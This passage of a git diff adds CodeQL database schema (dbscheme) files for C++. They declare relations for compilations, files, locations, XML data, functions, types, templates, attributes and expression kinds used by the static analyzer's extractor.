-*/ + +/** + * The CLI will automatically emit applicable tuples for this table, + * such as `databaseMetadata("isOverlay", "true")` when building an + * overlay database. + */ +databaseMetadata( + string metadataKey: string ref, + string value: string ref +); + +/*- Overlay support -*/ + +/** + * The CLI will automatically emit tuples for each new/modified/deleted file + * when building an overlay database. + */ +overlayChangedFiles( + string path: string ref +); + +/*- XML Files -*/ + +xmlEncoding( + unique int id: @file ref, + string encoding: string ref +); + +xmlDTDs( + unique int id: @xmldtd, + string root: string ref, + string publicId: string ref, + string systemId: string ref, + int fileid: @file ref +); + +xmlElements( + unique int id: @xmlelement, + string name: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int fileid: @file ref +); + +xmlAttrs( + unique int id: @xmlattribute, + int elementid: @xmlelement ref, + string name: string ref, + string value: string ref, + int idx: int ref, + int fileid: @file ref +); + +xmlNs( + int id: @xmlnamespace, + string prefixName: string ref, + string URI: string ref, + int fileid: @file ref +); + +xmlHasNs( + int elementId: @xmlnamespaceable ref, + int nsId: @xmlnamespace ref, + int fileid: @file ref +); + +xmlComments( + unique int id: @xmlcomment, + string text: string ref, + int parentid: @xmlparent ref, + int fileid: @file ref +); + +xmlChars( + unique int id: @xmlcharacters, + string text: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int isCDATA: int ref, + int fileid: @file ref +); + +@xmlparent = @file | @xmlelement; +@xmlnamespaceable = @xmlelement | @xmlattribute; + +xmllocations( + int xmlElement: @xmllocatable ref, + int location: @location_default ref +); + +@xmllocatable = @xmlcharacters | @xmlelement | @xmlcomment | @xmlattribute | @xmldtd | @file | @xmlnamespace; diff --git a/cpp/downgrades/0853f43dc8c08deecb473c54a2b70da8597f1ab5/semmlecode.cpp.dbscheme b/cpp/downgrades/0853f43dc8c08deecb473c54a2b70da8597f1ab5/semmlecode.cpp.dbscheme new file mode 100644 index 000000000000..ef8d209a22e2 --- /dev/null +++ b/cpp/downgrades/0853f43dc8c08deecb473c54a2b70da8597f1ab5/semmlecode.cpp.dbscheme @@ -0,0 +1,2577 @@ + +/*- Compilations -*/ + +/** + * An invocation of the compiler. Note that more than one file may be + * compiled per invocation. For example, this command compiles three + * source files: + * + * gcc -c f1.c f2.c f3.c + * + * The `id` simply identifies the invocation, while `cwd` is the working + * directory from which the compiler was invoked. + */ +compilations( + /** + * An invocation of the compiler. Note that more than one file may + * be compiled per invocation. For example, this command compiles + * three source files: + * + * gcc -c f1.c f2.c f3.c + */ + unique int id : @compilation, + string cwd : string ref +); + +/** + * The arguments that were passed to the extractor for a compiler + * invocation. If `id` is for the compiler invocation + * + * gcc -c f1.c f2.c f3.c + * + * then typically there will be rows for + * + * num | arg + * --- | --- + * 0 | *path to extractor* + * 1 | `--mimic` + * 2 | `/usr/bin/gcc` + * 3 | `-c` + * 4 | f1.c + * 5 | f2.c + * 6 | f3.c + */ +#keyset[id, num] +compilation_args( + int id : @compilation ref, + int num : int ref, + string arg : string ref +); + +/** + * The expanded arguments that were passed to the extractor for a + * compiler invocation. This is similar to `compilation_args`, but + * for a `@someFile` argument, it includes the arguments from that + * file, rather than just taking the argument literally. + */ +#keyset[id, num] +compilation_expanded_args( + int id : @compilation ref, + int num : int ref, + string arg : string ref +); + +/** + * Optionally, record the build mode for each compilation. + */ +compilation_build_mode( + unique int id : @compilation ref, + int mode : int ref +); + +/* +case @compilation_build_mode.mode of + 0 = @build_mode_none +| 1 = @build_mode_manual +| 2 = @build_mode_auto +; +*/ + +/** + * The source files that are compiled by a compiler invocation. + * If `id` is for the compiler invocation + * + * gcc -c f1.c f2.c f3.c + * + * then there will be rows for + * + * num | arg + * --- | --- + * 0 | f1.c + * 1 | f2.c + * 2 | f3.c + * + * Note that even if those files `#include` headers, those headers + * do not appear as rows. + */ +#keyset[id, num] +compilation_compiling_files( + int id : @compilation ref, + int num : int ref, + int file : @file ref +); + +/** + * The time taken by the extractor for a compiler invocation. + * + * For each file `num`, there will be rows for + * + * kind | seconds + * ---- | --- + * 1 | CPU seconds used by the extractor frontend + * 2 | Elapsed seconds during the extractor frontend + * 3 | CPU seconds used by the extractor backend + * 4 | Elapsed seconds during the extractor backend + */ +#keyset[id, num, kind] +compilation_time( + int id : @compilation ref, + int num : int ref, + /* kind: + 1 = frontend_cpu_seconds + 2 = frontend_elapsed_seconds + 3 = extractor_cpu_seconds + 4 = extractor_elapsed_seconds + */ + int kind : int ref, + float seconds : float ref +); + +/** + * An error or warning generated by the extractor. + * The diagnostic message `diagnostic` was generated during compiler + * invocation `compilation`, and is the `file_number_diagnostic_number`th + * message generated while extracting the `file_number`th file of that + * invocation. + */ +#keyset[compilation, file_number, file_number_diagnostic_number] +diagnostic_for( + int diagnostic : @diagnostic ref, + int compilation : @compilation ref, + int file_number : int ref, + int file_number_diagnostic_number : int ref +); + +/** + * If extraction was successful, then `cpu_seconds` and + * `elapsed_seconds` are the CPU time and elapsed time (respectively) + * that extraction took for compiler invocation `id`. + */ +compilation_finished( + unique int id : @compilation ref, + float cpu_seconds : float ref, + float elapsed_seconds : float ref +); + +/*- External data -*/ + +/** + * External data, loaded from CSV files during snapshot creation. See + * [Tutorial: Incorporating external data](https://help.semmle.com/wiki/display/SD/Tutorial%3A+Incorporating+external+data) + * for more information. + */ +externalData( + int id : @externalDataElement, + string path : string ref, + int column: int ref, + string value : string ref +); + +/*- Source location prefix -*/ + +/** + * The source location of the snapshot. + */ +sourceLocationPrefix(string prefix : string ref); + +/*- Files and folders -*/ + +/** + * The location of an element. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `file`. + * For more information, see + * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ +locations_default( + unique int id: @location_default, + int file: @file ref, + int beginLine: int ref, + int beginColumn: int ref, + int endLine: int ref, + int endColumn: int ref +); + +files( + unique int id: @file, + string name: string ref +); + +folders( + unique int id: @folder, + string name: string ref +); + +@container = @file | @folder + +containerparent( + int parent: @container ref, + unique int child: @container ref +); + +/*- Lines of code -*/ + +numlines( + int element_id: @sourceline ref, + int num_lines: int ref, + int num_code: int ref, + int num_comment: int ref +); + +/*- Diagnostic messages -*/ + +diagnostics( + unique int id: @diagnostic, + int severity: int ref, + string error_tag: string ref, + string error_message: string ref, + string full_error_message: string ref, + int location: @location_default ref +); + +/*- C++ dbscheme -*/ + +extractor_version( + string codeql_version: string ref, + string frontend_version: string ref +) + +/** + * Gives the TRAP filename that `trap` is associated with. + * For debugging only. + */ +trap_filename( + int trap: @trap, + string filename: string ref +); + +/** + * Gives the tag name for `tag`. + * For debugging only. + */ +tag_name( + int tag: @tag, + string name: string ref +); + +@trap_or_tag = @tag | @trap; + +/** + * Gives the name for the source file. + */ +source_file_name( + int sf: @source_file, + string name: string ref +); + +/** + * In `build-mode: none` overlay mode, indicates that `source_file` + * (`/path/to/foo.c`) uses the TRAP file `trap_file`; i.e. it is the + * TRAP file corresponding to `foo.c`, something it transitively + * includes, or a template instantiation it transitively uses. + */ +source_file_uses_trap( + int source_file: @source_file ref, + int trap_file: @trap ref +); + +/** + * In `build-mode: none` overlay mode, indicates that the TRAP file + * `trap_file` uses tag `tag`. + */ +trap_uses_tag( + int trap_file: @trap ref, + int tag: @tag ref +); + +/** + * Holds if there is a definition of `element` in TRAP file or tag `t`. + */ +in_trap_or_tag( + int element: @element ref, + int t: @trap_or_tag ref +); + +pch_uses( + int pch: @pch ref, + int compilation: @compilation ref, + int id: @file ref +) + +#keyset[pch, compilation] +pch_creations( + int pch: @pch, + int compilation: @compilation ref, + int from: @file ref +) + +/** An element for which line-count information is available. */ +@sourceline = @file | @function | @variable | @enumconstant | @xmllocatable; + +fileannotations( + int id: @file ref, + int kind: int ref, + string name: string ref, + string value: string ref +); + +inmacroexpansion( + int id: @element ref, + int inv: @macroinvocation ref +); + +affectedbymacroexpansion( + int id: @element ref, + int inv: @macroinvocation ref +); + +case @macroinvocation.kind of + 1 = @macro_expansion +| 2 = @other_macro_reference +; + +macroinvocations( + unique int id: @macroinvocation, + int macro_id: @ppd_define ref, + int location: @location_default ref, + int kind: int ref +); + +macroparent( + unique int id: @macroinvocation ref, + int parent_id: @macroinvocation ref +); + +// a macroinvocation may be part of another location +// the way to find a constant expression that uses a macro +// is thus to find a constant expression that has a location +// to which a macro invocation is bound +macrolocationbind( + int id: @macroinvocation ref, + int location: @location_default ref +); + +#keyset[invocation, argument_index] +macro_argument_unexpanded( + int invocation: @macroinvocation ref, + int argument_index: int ref, + string text: string ref +); + +#keyset[invocation, argument_index] +macro_argument_expanded( + int invocation: @macroinvocation ref, + int argument_index: int ref, + string text: string ref +); + +case @function.kind of + 0 = @unknown_function +| 1 = @normal_function +| 2 = @constructor +| 3 = @destructor +| 4 = @conversion_function +| 5 = @operator +// ... 6 = @builtin_function deprecated // GCC built-in functions, e.g. __builtin___memcpy_chk +| 7 = @user_defined_literal +| 8 = @deduction_guide +; + +functions( + unique int id: @function, + string name: string ref, + int kind: int ref +); + +builtin_functions( + int id: @function ref +) + +function_entry_point( + int id: @function ref, + unique int entry_point: @stmt ref +); + +function_return_type( + int id: @function ref, + int return_type: @type ref +); + +/** + * If `function` is a coroutine, then this gives the `std::experimental::resumable_traits` + * instance associated with it, and the variables representing the `handle` and `promise` + * for it. + */ +coroutine( + unique int function: @function ref, + int traits: @type ref +); + +/* +case @coroutine_placeholder_variable.kind of + 1 = @handle +| 2 = @promise +| 3 = @init_await_resume +; +*/ + +coroutine_placeholder_variable( + unique int placeholder_variable: @variable ref, + int kind: int ref, + int function: @function ref +) + +/** The `new` function used for allocating the coroutine state, if any. */ +coroutine_new( + unique int function: @function ref, + int new: @function ref +); + +/** The `delete` function used for deallocating the coroutine state, if any. */ +coroutine_delete( + unique int function: @function ref, + int delete: @function ref +); + +purefunctions(unique int id: @function ref); + +function_deleted(unique int id: @function ref); + +function_defaulted(unique int id: @function ref); + +function_prototyped(unique int id: @function ref) + +deduction_guide_for_class( + int id: @function ref, + int class_template: @usertype ref +) + +member_function_this_type( + unique int id: @function ref, + int this_type: @type ref +); + +#keyset[id, type_id] +fun_decls( + int id: @fun_decl, + int function: @function ref, + int type_id: @type ref, + string name: string ref, + int location: @location_default ref +); +fun_def(unique int id: @fun_decl ref); +fun_specialized(unique int id: @fun_decl ref); +fun_implicit(unique int id: @fun_decl ref); +fun_decl_specifiers( + int id: @fun_decl ref, + string name: string ref +) +#keyset[fun_decl, index] +fun_decl_throws( + int fun_decl: @fun_decl ref, + int index: int ref, + int type_id: @type ref +); +/* an empty throw specification is different from none */ +fun_decl_empty_throws(unique int fun_decl: @fun_decl ref); +fun_decl_noexcept( + int fun_decl: @fun_decl ref, + int constant: @expr ref +); +fun_decl_empty_noexcept(int fun_decl: @fun_decl ref); +fun_decl_typedef_type( + unique int fun_decl: @fun_decl ref, + int typedeftype_id: @usertype ref +); + +/* +case @fun_requires.kind of + 1 = @template_attached +| 2 = @function_attached +; +*/ + +fun_requires( + int id: @fun_decl ref, + int kind: int ref, + int constraint: @expr ref +); + +param_decl_bind( + unique int id: @var_decl ref, + int index: int ref, + int fun_decl: @fun_decl ref +); + +#keyset[id, type_id] +var_decls( + int id: @var_decl, + int variable: @variable ref, + int type_id: @type ref, + string name: string ref, + int location: @location_default ref +); +var_def(unique int id: @var_decl ref); +var_specialized(int id: @var_decl ref); +var_decl_specifiers( + int id: @var_decl ref, + string name: string ref +) +is_structured_binding(unique int id: @variable ref); +var_requires( + int id: @var_decl ref, + int constraint: @expr ref +); + +type_decls( + unique int id: @type_decl, + int type_id: @type ref, + int location: @location_default ref +); +type_def(unique int id: @type_decl ref); +type_decl_top( + unique int type_decl: @type_decl ref +); +type_requires( + int id: @type_decl ref, + int constraint: @expr ref +); + +namespace_decls( + unique int id: @namespace_decl, + int namespace_id: @namespace ref, + int location: @location_default ref, + int bodylocation: @location_default ref +); + +case @using.kind of + 1 = @using_declaration +| 2 = @using_directive +| 3 = @using_enum_declaration +; + +usings( + unique int id: @using, + int element_id: @element ref, + int location: @location_default ref, + int kind: int ref +); + +/** The element which contains the `using` declaration. */ +using_container( + int parent: @element ref, + int child: @using ref +); + +static_asserts( + unique int id: @static_assert, + int condition : @expr ref, + string message : string ref, + int location: @location_default ref, + int enclosing : @element ref +); + +// each function has an ordered list of parameters +#keyset[id, type_id] +#keyset[function, index, type_id] +params( + int id: @parameter, + int function: @parameterized_element ref, + int index: int ref, + int type_id: @type ref +); + +overrides( + int new: @function ref, + int old: @function ref +); + +#keyset[id, type_id] +membervariables( + int id: @membervariable, + int type_id: @type ref, + string name: string ref +); + +#keyset[id, type_id] +globalvariables( + int id: @globalvariable, + int type_id: @type ref, + string name: string ref +); + +#keyset[id, type_id] +localvariables( + int id: @localvariable, + int type_id: @type ref, + string name: string ref +); + +autoderivation( + unique int var: @variable ref, + int derivation_type: @type ref +); + +orphaned_variables( + int var: @localvariable ref, + int function: @function ref +) + +enumconstants( + unique int id: @enumconstant, + int parent: @usertype ref, + int index: int ref, + int type_id: @type ref, + string name: string ref, + int location: @location_default ref +); + +@variable = @localscopevariable | @globalvariable | @membervariable; + +@localscopevariable = @localvariable | @parameter; + +/** + * Built-in types are the fundamental types, e.g., integral, floating, and void. + */ +case @builtintype.kind of + 1 = @errortype +| 2 = @unknowntype +| 3 = @void +| 4 = @boolean +| 5 = @char +| 6 = @unsigned_char +| 7 = @signed_char +| 8 = @short +| 9 = @unsigned_short +| 10 = @signed_short +| 11 = @int +| 12 = @unsigned_int +| 13 = @signed_int +| 14 = @long +| 15 = @unsigned_long +| 16 = @signed_long +| 17 = @long_long +| 18 = @unsigned_long_long +| 19 = @signed_long_long +// ... 20 Microsoft-specific __int8 +// ... 21 Microsoft-specific __int16 +// ... 22 Microsoft-specific __int32 +// ... 23 Microsoft-specific __int64 +| 24 = @float +| 25 = @double +| 26 = @long_double +| 27 = @complex_float // C99-specific _Complex float +| 28 = @complex_double // C99-specific _Complex double +| 29 = @complex_long_double // C99-specific _Complex long double +| 30 = @imaginary_float // C99-specific _Imaginary float +| 31 = @imaginary_double // C99-specific _Imaginary double +| 32 = @imaginary_long_double // C99-specific _Imaginary long double +| 33 = @wchar_t // Microsoft-specific +| 34 = @decltype_nullptr // C++11 +| 35 = @int128 // __int128 +| 36 = @unsigned_int128 // unsigned __int128 +| 37 = @signed_int128 // signed __int128 +| 38 = @float128 // __float128 +| 39 = @complex_float128 // _Complex __float128 +// ... 40 _Decimal32 +// ... 41 _Decimal64 +// ... 42 _Decimal128 +| 43 = @char16_t +| 44 = @char32_t +| 45 = @std_float32 // _Float32 +| 46 = @float32x // _Float32x +| 47 = @std_float64 // _Float64 +| 48 = @float64x // _Float64x +| 49 = @std_float128 // _Float128 +// ... 50 _Float128x +| 51 = @char8_t +| 52 = @float16 // _Float16 +| 53 = @complex_float16 // _Complex _Float16 +| 54 = @fp16 // __fp16 +| 55 = @std_bfloat16 // __bf16 +| 56 = @std_float16 // std::float16_t +| 57 = @complex_std_float32 // _Complex _Float32 +| 58 = @complex_float32x // _Complex _Float32x +| 59 = @complex_std_float64 // _Complex _Float64 +| 60 = @complex_float64x // _Complex _Float64x +| 61 = @complex_std_float128 // _Complex _Float128 +| 62 = @mfp8 // __mfp8 +| 63 = @scalable_vector_count // __SVCount_t +| 64 = @complex_fp16 // _Complex __fp16 +| 65 = @complex_std_bfloat16 // _Complex __bf16 +| 66 = @complex_std_float16 // _Complex std::float16_t +; + +builtintypes( + unique int id: @builtintype, + string name: string ref, + int kind: int ref, + int size: int ref, + int sign: int ref, + int alignment: int ref +); + +/** + * Derived types are types that are directly derived from existing types and + * point to, refer to, transform type data to return a new type. + */ +case @derivedtype.kind of + 1 = @pointer +| 2 = @reference +| 3 = @type_with_specifiers +| 4 = @array +| 5 = @gnu_vector +| 6 = @routineptr +| 7 = @routinereference +| 8 = @rvalue_reference // C++11 +// ... 9 type_conforming_to_protocols deprecated +| 10 = @block +| 11 = @scalable_vector // Arm SVE +; + +derivedtypes( + unique int id: @derivedtype, + string name: string ref, + int kind: int ref, + int type_id: @type ref +); + +pointerishsize(unique int id: @derivedtype ref, + int size: int ref, + int alignment: int ref); + +arraysizes( + unique int id: @derivedtype ref, + int num_elements: int ref, + int bytesize: int ref, + int alignment: int ref +); + +tupleelements( + unique int id: @derivedtype ref, + int num_elements: int ref +); + +typedefbase( + unique int id: @usertype ref, + int type_id: @type ref +); + +/** + * An instance of the C++11 `decltype` operator or C23 `typeof`/`typeof_unqual` + * operator taking an expression as its argument. For example: + * ``` + * int a; + * decltype(1+a) b; + * typeof(1+a) c; + * ``` + * Here `expr` is `1+a`. + * + * Sometimes an additional pair of parentheses around the expression + * changes the semantics of the decltype, e.g. + * ``` + * struct A { double x; }; + * const A* a = new A(); + * decltype( a->x ); // type is double + * decltype((a->x)); // type is const double& + * ``` + * (Please consult the C++11 standard for more details). + * `parentheses_would_change_meaning` is `true` iff that is the case. + */ + +/* +case @decltype.kind of +| 0 = @decltype +| 1 = @typeof // The frontend does not differentiate between typeof and typeof_unqual +; +*/ + +#keyset[id, expr] +decltypes( + int id: @decltype, + int expr: @expr ref, + int kind: int ref, + int base_type: @type ref, + boolean parentheses_would_change_meaning: boolean ref +); + +case @type_operator.kind of + 0 = @typeof // The frontend does not differentiate between typeof and typeof_unqual +| 1 = @underlying_type +| 2 = @bases +| 3 = @direct_bases +| 4 = @add_lvalue_reference +| 5 = @add_pointer +| 6 = @add_rvalue_reference +| 7 = @decay +| 8 = @make_signed +| 9 = @make_unsigned +| 10 = @remove_all_extents +| 11 = @remove_const +| 12 = @remove_cv +| 13 = @remove_cvref +| 14 = @remove_extent +| 15 = @remove_pointer +| 16 = @remove_reference_t +| 17 = @remove_restrict +| 18 = @remove_volatile +| 19 = @remove_reference +; + +type_operators( + unique int id: @type_operator, + int arg_type: @type ref, + int kind: int ref, + int base_type: @type ref +) + +case @usertype.kind of + 0 = @unknown_usertype +| 1 = @struct +| 2 = @class +| 3 = @union +| 4 = @enum +// ... 5 = @typedef deprecated // classic C: typedef typedef type name +// ... 6 = @template deprecated +| 7 = @template_parameter +| 8 = @template_template_parameter +| 9 = @proxy_class // a proxy class associated with a template parameter +// ... 10 objc_class deprecated +// ... 11 objc_protocol deprecated +// ... 12 objc_category deprecated +| 13 = @scoped_enum +// ... 14 = @using_alias deprecated // a using name = type style typedef +| 15 = @template_struct +| 16 = @template_class +| 17 = @template_union +| 18 = @alias +; + +usertypes( + unique int id: @usertype, + string name: string ref, + int kind: int ref +); + +usertypesize( + unique int id: @usertype ref, + int size: int ref, + int alignment: int ref +); + +usertype_final(unique int id: @usertype ref); + +usertype_uuid( + unique int id: @usertype ref, + string uuid: string ref +); + +/* +case @usertype.alias_kind of +| 0 = @typedef +| 1 = @alias +*/ + +usertype_alias_kind( + int id: @usertype ref, + int alias_kind: int ref +) + +nontype_template_parameters( + int id: @expr ref +); + +type_template_type_constraint( + int id: @usertype ref, + int constraint: @expr ref +); + +mangled_name( + unique int id: @declaration ref, + int mangled_name : @mangledname, + boolean is_complete: boolean ref +); + +is_pod_class(unique int id: @usertype ref); +is_standard_layout_class(unique int id: @usertype ref); + +is_complete(unique int id: @usertype ref); + +is_class_template(unique int id: @usertype ref); +class_instantiation( + int to: @usertype ref, + int from: @usertype ref +); +class_template_argument( + int type_id: @usertype ref, + int index: int ref, + int arg_type: @type ref +); +class_template_argument_value( + int type_id: @usertype ref, + int index: int ref, + int arg_value: @expr ref +); +class_template_generated_from( + unique int template: @usertype ref, + int from: @usertype ref +) + +@user_or_decltype = @usertype | @decltype; + +is_proxy_class_for( + unique int id: @usertype ref, + int templ_param_id: @user_or_decltype ref +); + +type_mentions( + unique int id: @type_mention, + int type_id: @type ref, + int location: @location_default ref, + // a_symbol_reference_kind from the frontend. + int kind: int ref +); + +is_function_template(unique int id: @function ref); +function_instantiation( + unique int to: @function ref, + int from: @function ref +); +function_template_argument( + int function_id: @function ref, + int index: int ref, + int arg_type: @type ref +); +function_template_argument_value( + int function_id: @function ref, + int index: int ref, + int arg_value: @expr ref +); +function_template_generated_from( + unique int template: @function ref, + int from: @function ref +); + +is_variable_template(unique int id: @variable ref); +variable_instantiation( + unique int to: @variable ref, + int from: @variable ref +); +variable_template_argument( + int variable_id: @variable ref, + int index: int ref, + int arg_type: @type ref +); +variable_template_argument_value( + int variable_id: @variable ref, + int index: int ref, + int arg_value: @expr ref +); +variable_template_generated_from( + unique int template: @variable ref, + int from: @variable ref +); + +is_alias_template(unique int id: @usertype ref); +alias_instantiation( + unique int to: @usertype ref, + int from: @usertype ref +); +alias_template_argument( + int type_id: @usertype ref, + int index: int ref, + int arg_type: @type ref +); +alias_template_argument_value( + int type_id: @usertype ref, + int index: int ref, + int arg_value: @expr ref +); +alias_template_generated_from( + unique int template: @usertype ref, + int from: @usertype ref +); + +template_template_instantiation( + int to: @usertype ref, + int from: @usertype ref +); +template_template_argument( + int type_id: @usertype ref, + int index: int ref, + int arg_type: @type ref +); +template_template_argument_value( + int type_id: @usertype ref, + int index: int ref, + int arg_value: @expr ref +); + +@concept = @concept_template | @concept_id; + +concept_templates( + unique int concept_id: @concept_template, + string name: string ref, + int location: @location_default ref +); +concept_instantiation( + unique int to: @concept_id ref, + int from: @concept_template ref +); +is_type_constraint(int concept_id: @concept_id ref); +concept_template_argument( + int concept_id: @concept ref, + int index: int ref, + int arg_type: @type ref +); +concept_template_argument_value( + int concept_id: @concept ref, + int index: int ref, + int arg_value: @expr ref +); + +routinetypes( + unique int id: @routinetype, + int return_type: @type ref +); + +routinetypeargs( + int routine: @routinetype ref, + int index: int ref, + int type_id: @type ref +); + +ptrtomembers( + unique int id: @ptrtomember, + int type_id: @type ref, + int class_id: @type ref +); + +/* + specifiers for types, functions, and variables + + "public", + "protected", + "private", + + "const", + "volatile", + "static", + + "pure", + "virtual", + "sealed", // Microsoft + "__interface", // Microsoft + "inline", + "explicit", + + "near", // near far extension + "far", // near far extension + "__ptr32", // Microsoft + "__ptr64", // Microsoft + "__sptr", // Microsoft + "__uptr", // Microsoft + "dllimport", // Microsoft + "dllexport", // Microsoft + "thread", // Microsoft + "naked", // Microsoft + "microsoft_inline", // Microsoft + "forceinline", // Microsoft + "selectany", // Microsoft + "nothrow", // Microsoft + "novtable", // Microsoft + "noreturn", // Microsoft + "noinline", // Microsoft + "noalias", // Microsoft + "restrict", // Microsoft +*/ + +specifiers( + unique int id: @specifier, + unique string str: string ref +); + +typespecifiers( + int type_id: @type ref, + int spec_id: @specifier ref +); + +funspecifiers( + int func_id: @function ref, + int spec_id: @specifier ref +); + +varspecifiers( + int var_id: @accessible ref, + int spec_id: @specifier ref +); + +explicit_specifier_exprs( + unique int func_id: @function ref, + int constant: @expr ref +) + +attributes( + unique int id: @attribute, + int kind: int ref, + string name: string ref, + string name_space: string ref, + int location: @location_default ref +); + +case @attribute.kind of + 0 = @gnuattribute +| 1 = @stdattribute +| 2 = @declspec +| 3 = @msattribute +| 4 = @alignas +// ... 5 @objc_propertyattribute deprecated +; + +attribute_args( + unique int id: @attribute_arg, + int kind: int ref, + int attribute: @attribute ref, + int index: int ref, + int location: @location_default ref +); + +case @attribute_arg.kind of + 0 = @attribute_arg_empty +| 1 = @attribute_arg_token +| 2 = @attribute_arg_constant +| 3 = @attribute_arg_type +| 4 = @attribute_arg_constant_expr +| 5 = @attribute_arg_expr +; + +attribute_arg_value( + unique int arg: @attribute_arg ref, + string value: string ref +); +attribute_arg_type( + unique int arg: @attribute_arg ref, + int type_id: @type ref +); +attribute_arg_constant( + unique int arg: @attribute_arg ref, + int constant: @expr ref +) +attribute_arg_expr( + unique int arg: @attribute_arg ref, + int expr: @expr ref +) +attribute_arg_name( + unique int arg: @attribute_arg ref, + string name: string ref +); + +typeattributes( + int type_id: @type ref, + int spec_id: @attribute ref +); + +funcattributes( + int func_id: @function ref, + int spec_id: @attribute ref +); + +varattributes( + int var_id: @accessible ref, + int spec_id: @attribute ref +); + +namespaceattributes( + int namespace_id: @namespace ref, + int spec_id: @attribute ref +); + +stmtattributes( + int stmt_id: @stmt ref, + int spec_id: @attribute ref +); + +@type = @builtintype + | @derivedtype + | @usertype + | @routinetype + | @ptrtomember + | @decltype + | @type_operator; + +unspecifiedtype( + unique int type_id: @type ref, + int unspecified_type_id: @type ref +); + +member( + int parent: @type ref, + int index: int ref, + int child: @member ref +); + +@enclosingfunction_child = @usertype | @variable | @namespace + +enclosingfunction( + unique int child: @enclosingfunction_child ref, + int parent: @function ref +); + +derivations( + unique int derivation: @derivation, + int sub: @type ref, + int index: int ref, + int super: @type ref, + int location: @location_default ref +); + +derspecifiers( + int der_id: @derivation ref, + int spec_id: @specifier ref +); + +/** + * Contains the byte offset of the base class subobject within the derived + * class. Only holds for non-virtual base classes, but see table + * `virtual_base_offsets` for offsets of virtual base class subobjects. + */ +direct_base_offsets( + unique int der_id: @derivation ref, + int offset: int ref +); + +/** + * Contains the byte offset of the virtual base class subobject for class + * `super` within a most-derived object of class `sub`. `super` can be either a + * direct or indirect base class. + */ +#keyset[sub, super] +virtual_base_offsets( + int sub: @usertype ref, + int super: @usertype ref, + int offset: int ref +); + +frienddecls( + unique int id: @frienddecl, + int type_id: @type ref, + int decl_id: @declaration ref, + int location: @location_default ref +); + +@declaredtype = @usertype ; + +@declaration = @function + | @declaredtype + | @variable + | @enumconstant + | @frienddecl + | @concept_template; + +@member = @membervariable + | @function + | @declaredtype + | @enumconstant; + +@locatable = @diagnostic + | @declaration + | @ppd_include + | @ppd_define + | @macroinvocation + /*| @funcall*/ + | @xmllocatable + | @attribute + | @attribute_arg; + +@namedscope = @namespace | @usertype; + +@element = @locatable + | @file + | @folder + | @specifier + | @type + | @expr + | @namespace + | @initialiser + | @stmt + | @derivation + | @comment + | @preprocdirect + | @fun_decl + | @var_decl + | @type_decl + | @namespace_decl + | @using + | @namequalifier + | @specialnamequalifyingelement + | @static_assert + | @type_mention + | @lambdacapture; + +@exprparent = @element; + +comments( + unique int id: @comment, + string contents: string ref, + int location: @location_default ref +); + +commentbinding( + int id: @comment ref, + int element: @element ref +); + +exprconv( + int converted: @expr ref, + unique int conversion: @expr ref +); + +compgenerated(unique int id: @element ref); + +/** + * `destructor_call` destructs the `i`'th entity that should be + * destructed following `element`. Note that entities should be + * destructed in reverse construction order, so for a given `element` + * these should be called from highest to lowest `i`. + */ +#keyset[element, destructor_call] +#keyset[element, i] +synthetic_destructor_call( + int element: @element ref, + int i: int ref, + int destructor_call: @routineexpr ref +); + +namespaces( + unique int id: @namespace, + string name: string ref +); + +namespace_inline( + unique int id: @namespace ref +); + +namespacembrs( + int parentid: @namespace ref, + unique int memberid: @namespacembr ref +); + +@namespacembr = @declaration | @namespace; + +exprparents( + int expr_id: @expr ref, + int child_index: int ref, + int parent_id: @exprparent ref +); + +expr_isload(unique int expr_id: @expr ref); + +@cast = @c_style_cast + | @const_cast + | @dynamic_cast + | @reinterpret_cast + | @static_cast + ; + +/* +case @conversion.kind of + 0 = @simple_conversion // a numeric conversion, qualification conversion, or a reinterpret_cast +| 1 = @bool_conversion // conversion to 'bool' +| 2 = @base_class_conversion // a derived-to-base conversion +| 3 = @derived_class_conversion // a base-to-derived conversion +| 4 = @pm_base_class_conversion // a derived-to-base conversion of a pointer to member +| 5 = @pm_derived_class_conversion // a base-to-derived conversion of a pointer to member +| 6 = @glvalue_adjust // an adjustment of the type of a glvalue +| 7 = @prvalue_adjust // an adjustment of the type of a prvalue +; +*/ +/** + * Describes the semantics represented by a cast expression. This is largely + * independent of the source syntax of the cast, so it is separate from the + * regular expression kind. + */ +conversionkinds( + unique int expr_id: @cast ref, + int kind: int ref +); + +@conversion = @cast + | @array_to_pointer + | @parexpr + | @reference_to + | @ref_indirect + | @temp_init + | @c11_generic + ; + +/* +case @funbindexpr.kind of + 0 = @normal_call // a normal call +| 1 = @virtual_call // a virtual call +| 2 = @adl_call // a call whose target is only found by ADL +; +*/ +iscall( + unique int caller: @funbindexpr ref, + int kind: int ref +); + +numtemplatearguments( + unique int expr_id: @expr ref, + int num: int ref +); + +specialnamequalifyingelements( + unique int id: @specialnamequalifyingelement, + unique string name: string ref +); + +@namequalifiableelement = @expr | @namequalifier; +@namequalifyingelement = @namespace + | @specialnamequalifyingelement + | @usertype + | @decltype; + +namequalifiers( + unique int id: @namequalifier, + unique int qualifiableelement: @namequalifiableelement ref, + int qualifyingelement: @namequalifyingelement ref, + int location: @location_default ref +); + +varbind( + int expr: @varbindexpr ref, + int var: @accessible ref +); + +funbind( + int expr: @funbindexpr ref, + int fun: @function ref +); + +@any_new_expr = @new_expr + | @new_array_expr; + +@new_or_delete_expr = @any_new_expr + | @delete_expr + | @delete_array_expr; + +@prefix_crement_expr = @preincrexpr | @predecrexpr; + +@postfix_crement_expr = @postincrexpr | @postdecrexpr; + +@increment_expr = @preincrexpr | @postincrexpr; + +@decrement_expr = @predecrexpr | @postdecrexpr; + +@crement_expr = @increment_expr | @decrement_expr; + +@un_arith_op_expr = @arithnegexpr + | @unaryplusexpr + | @conjugation + | @realpartexpr + | @imagpartexpr + | @crement_expr + ; + +@un_bitwise_op_expr = @complementexpr; + +@un_log_op_expr = @notexpr; + +@un_op_expr = @address_of + | @indirect + | @un_arith_op_expr + | @un_bitwise_op_expr + | @builtinaddressof + | @vec_fill + | @un_log_op_expr + | @co_await + | @co_yield + ; + +@bin_log_op_expr = @andlogicalexpr | @orlogicalexpr; + +@cmp_op_expr = @eq_op_expr | @rel_op_expr; + +@eq_op_expr = @eqexpr | @neexpr; + +@rel_op_expr = @gtexpr + | @ltexpr + | @geexpr + | @leexpr + | @spaceshipexpr + ; + +@bin_bitwise_op_expr = @lshiftexpr + | @rshiftexpr + | @andexpr + | @orexpr + | @xorexpr + 